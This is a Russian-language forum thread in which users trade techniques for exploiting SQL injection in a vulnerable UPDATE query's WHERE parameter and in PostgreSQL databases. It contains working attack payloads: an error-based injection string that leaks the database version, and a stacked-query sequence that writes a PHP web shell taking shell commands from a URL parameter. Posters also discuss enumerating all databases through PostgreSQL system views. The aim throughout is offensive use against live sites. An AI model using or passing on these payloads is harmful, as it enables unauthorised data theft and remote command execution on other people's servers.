как быть?(что почитать? на ачате все прочитал) курю про инъекции уже 2-ой день, чет хреноватенько получается.. не мой профиль
Вопрос: допустим имеется следующий SQL запрос: UPDATE news SET some_var = var+1 WHERE news_id=27. Уязвимым параметром является news_id. Что и как мне можно из этого выжать? =)
В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...
where 'sqli' sqli='and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x
Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?
Вот че в нете нашел: PHP: ?a=1;CREATE TABLE shell (a text); ?a=1;INSERT INTO shell(a) VALUES ('<? pasthru($_GET[cmd]); ?>'); ?a=1;COPY shell (a) TO shellaaaa; ?a=1; DROP TABLE shell;
Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес
Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память <=7 версии Вопрос по прежнему актуален
Да неужели? В документации написано для восьмой версии: http://www.postgresql.org/docs/8.0/static/view-pg-tables.html P.S. Может в документации ошибка?
